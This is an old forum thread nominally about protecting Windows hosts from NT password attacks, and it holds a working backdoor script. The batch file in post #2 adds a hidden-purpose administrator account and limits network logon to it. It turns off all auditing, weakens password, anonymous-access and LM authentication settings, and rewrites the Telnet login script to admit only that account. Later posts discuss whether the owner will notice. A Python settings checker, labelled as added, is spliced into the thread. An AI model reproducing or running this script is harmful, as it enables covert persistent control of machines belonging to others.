Forums: Securing A Host Against Ntpass Attack


Securing A Host Against Ntpass Attack

#1 =k3Rn=

  • Corporal
  • Group: Members
  • Posts: 158
  • Joined: 17-September 03

Posted 17 September 2003 - 11:54 PM

hi!

i want to write a short batch file to secure hosts that have weak NT accounts.
up to now i found the following registry keys, to turn off remote registry access and the automated admin shares.

in the batch you would first kill the shares (c$-x$, ipc$, admin$)
and then add the reg keys

HKEY_LOCAL_MACHINE --> System --> CurrentControlSet --> Services --> LanmanServer --> Parameters

the 2 REG_DWORDs "AutoShareServer" and "AutoShareWks" set to zero

and

rem write a fresh root.reg (> creates it; >> would append to a stale copy),
rem leave the blank line REGEDIT4 expects after the header, and target
rem CurrentControlSet (the set in use) rather than ControlSet001
echo REGEDIT4 > root.reg
echo. >> root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry] >> root.reg
rem Start=3 is manual start; 4 would disable the service outright
echo "Start"=dword:00000003 >> root.reg
regedit /S root.reg
net stop RemoteRegistry

what else has to be done?
does anyone have a batch file to manage that?

greetings
=k3Rn=

#2 LiquidIce

  • Private First Class
  • Group: Members
  • Posts: 34
  • Joined: 04-June 03

Posted 27 September 2003 - 05:45 PM

rem Blocks all netbios connections from all accounts except the one specified
rem secure.bat UserName Password *

@echo off
del temp
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional)  >> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp

net user /add %1 %2
net localgroup administrators %1 /add
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp

del %SystemRoot%\system32\login.cmd
echo @echo off >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem  Default global login script for the Telnet Server  >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem  In the default setup, this command script is executed when the >> %SystemRoot%\system32\login.cmd
echo rem  initial command shell is invoked.  It, in turn, will try to invoke >> %SystemRoot%\system32\login.cmd
echo rem  the individual user's login script. >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd

echo if %%USERNAME%%==%1 goto good >> %SystemRoot%\system32\login.cmd
echo exit >> %SystemRoot%\system32\login.cmd
echo :good >> %SystemRoot%\system32\login.cmd

echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd
echo echo Welcome to Microsoft Telnet Server. >> %SystemRoot%\system32\login.cmd
echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd

rem every %% here becomes one % in login.cmd, so both variables expand at telnet login rather than now
echo cd /d %%HOMEDRIVE%%%%HOMEPATH%% >> %SystemRoot%\system32\login.cmd
del temp

del root.reg
echo REGEDIT4 > root.reg
echo. >> root.reg
rem CurrentControlSet is the control set in use; ControlSet001 is not always the live one
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry] >> root.reg
echo "Start"=dword:00000003 >> root.reg
regedit /S root.reg
net stop RemoteRegistry
del root.reg

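Added example, not code from this thread: a Python checker for the secedit template format that the batch above writes. It parses the INF dialect (one "=" per line, keys containing backslashes) and reports the entries that decide how exposed the host is to password guessing: the [System Access] password and lockout settings, lsa\restrictanonymous and lsa\lmcompatibilitylevel under [Registry Values], and a SeNetworkLogonRight that names individual accounts instead of the built-in group SIDs. The sample lines, the thresholds (minimum length 8, LMCompatibilityLevel 3) and the account name "newuser" are constructed assumptions.

```python
import configparser
from typing import List, Optional
# Constructed sample: the template lines that decide exposure to password guessing over SMB
SAMPLE_INF = """\
[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Registry Values]
machine\\system\\currentcontrolset\\control\\lsa\\restrictanonymous=4,0
machine\\system\\currentcontrolset\\control\\lsa\\lmcompatibilitylevel=4,0
[Privilege Rights]
senetworklogonright = newuser
"""
LSA = "machine\\system\\currentcontrolset\\control\\lsa\\"

def parse_inf(text: str) -> configparser.ConfigParser:
    # secedit INF is INI-like: '=' delimited, keys may contain backslashes and spaces
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None)
    cp.read_string(text)
    return cp

def reg_dword(cp: configparser.ConfigParser, key: str) -> Optional[int]:
    """[Registry Values] entries are 'type,data'; type 4 is REG_DWORD."""
    raw = cp.get("Registry Values", key, fallback=None)
    if raw is None:
        return None
    kind, _, data = raw.partition(",")
    return int(data) if kind.strip() == "4" and data.strip().isdigit() else None

def audit_template(text: str) -> List[str]:
    """Findings for settings that weaken the host against guessing (thresholds assumed)."""
    cp = parse_inf(text)
    sa = cp["System Access"] if cp.has_section("System Access") else {}
    f = []
    if int(sa.get("minimumpasswordlength", "0")) < 8:
        f.append("MinimumPasswordLength < 8: short passwords allowed")
    if int(sa.get("passwordcomplexity", "0")) == 0:
        f.append("PasswordComplexity 0: dictionary words accepted")
    if int(sa.get("lockoutbadcount", "0")) == 0:
        f.append("LockoutBadCount 0: unlimited guesses, no lockout")
    if reg_dword(cp, LSA + "restrictanonymous") == 0:
        f.append("RestrictAnonymous 0: null sessions may enumerate accounts")
    lvl = reg_dword(cp, LSA + "lmcompatibilitylevel")
    if lvl is not None and lvl < 3:
        f.append("LMCompatibilityLevel < 3: LM/NTLMv1 responses instead of NTLMv2 only")
    # network logon right held by named accounts only (no *S-1-5-32-* group SID)
    who = [a.strip() for a in cp.get("Privilege Rights", "senetworklogonright", fallback="").split(",") if a.strip()]
    if who and not any(a.startswith("*S-1-5-32-") for a in who):
        f.append("SeNetworkLogonRight limited to named account(s): " + ", ".join(who))
    return f
```

Run against the full template the batch writes (everything between the `[Version]` line and `[Privilege Rights]` saved to a file) the same function reports the same six weaknesses.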

#3 =k3Rn=

  • Corporal
  • Group: Members
  • Posts: 158
  • Joined: 17-September 03

Posted 27 September 2003 - 06:58 PM

yea i know that batch file.
first question, does it only work on win2k systems or also on win xp?
and second, it creates a new admin account - won't the admin / user of the computer see that?

#4 Guest_hermel_*

  • Group: Guests

Posted 14 October 2003 - 12:00 AM

The batch file works on NT, W2K and XP.

You can add a new user with:
net user hermel myPW /add
net localgroup Administrators hermel /add

But the admin can see that a new user with admin rights is there.